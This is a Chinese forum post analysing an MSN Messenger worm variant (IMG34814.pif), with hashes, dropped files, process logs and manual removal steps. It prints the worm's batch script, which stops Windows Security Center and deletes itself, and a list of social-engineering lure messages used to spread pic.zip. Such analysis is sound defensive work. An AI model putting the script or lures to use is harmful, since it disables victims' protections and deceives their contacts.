警惕MSN变种蠕虫
MSN蠕虫又更新了??.....
2号的Dr、AVG、瑞星、金山、偌顿、咖啡、江民等都没有报。
文件名称:IMG34814.pif
文件大小:141824 byte
AV命名:Trojan.Win32.Delf.ads(卡吧斯基)
加壳方式:无
编写语言:Borland Delphi 6.0 - 7.0
病毒类型:后门
文件MD5:ef2e009208e0efef05d149ee06388dd3
文件SHA1:45E43FB7BD4EB62D524927F5BE71240A74C9BB6B
传播方式:MSN。
行为分析:
1、释放病毒文件:
%Windir%\msnmsg.exe 41824 字节
%Windir%\pic.zip 141946 字节
(压缩包)
%Windir%为:C:\Winnt(2000、ME系统) C:\Windows(XP、2003)
2、释放P处理:c:\a.bat
内容:
@echo off
net stop "Security Center"
net stop winvnc4
del c:\a.bat
net stop "Security Center"
net stop winvnc4
del c:\a.bat
启动CMD,并调用Net Stop尝试禁用下面服务:
Security Center(安全中心) winvnc4(远控)
SSM日志:
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net stop winvnc4
3、无判断方式尝试启动msnmsgr.exe
日志;
Parent process:
Path: C:\WINNT\system32\svchost.exe
PID: 404
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Information: MSN Messenger (Microsoft Corporation)
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
Path: C:\WINNT\system32\svchost.exe
PID: 404
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Information: MSN Messenger (Microsoft Corporation)
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
4、假冒的msnmsgr.exe(C:\Windows\msnmsgr.exe)驻进程,连接213.232.92.1**,并开启1863端口。
(汗,很逼真,按IP显示,可能是英国的IRC服务器,不过未见其他行为)
5、检测MSN聊天窗口,并随机出现下列对话和pic.zip 压缩包:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips :-P
Look what i made out of cans!! haah :-P!
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of harry potter?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips :-P
Look what i made out of cans!! haah :-P!
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of harry potter?
(未证实)
解决方法:
先去试下MSN蠕虫专杀,看能不能杀~~
手工清除:
下载SREng
[url]http://www.kztechs.com/sreng/download.html[/url]
1、断开网络,关闭不需要的进程。
2、打开任务管理器,结束msnmsgr.exe进程(有几个关几个``)
3、打开SREng,删除:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Microsoft Genuine Logon><msnmsg.exe> []
<Microsoft Genuine Logon><msnmsg.exe> []
4、删除:
%Windir%\msnmsg.exe 41824 字节 (注意路径)
%Windir%\pic.zip 141946 字节(压缩包)
%Windir%为:C:\Winnt(2000、ME系统) C:\Windows(XP、2003)
PS:如果无法结束msnmsgr.exe进程的话,可以忽略,先清理注册表,重启后再删除msnmsg.exe。
孤独AD:
上述方法无法清除或症状无一致的,请联系Q526170722
远程杀毒的就不必了!
``最好能提供样本的```
``最好能提供样本的```
讨论技术或清除方法的也免了
(已不再研究反毒技术)
(已不再研究反毒技术)
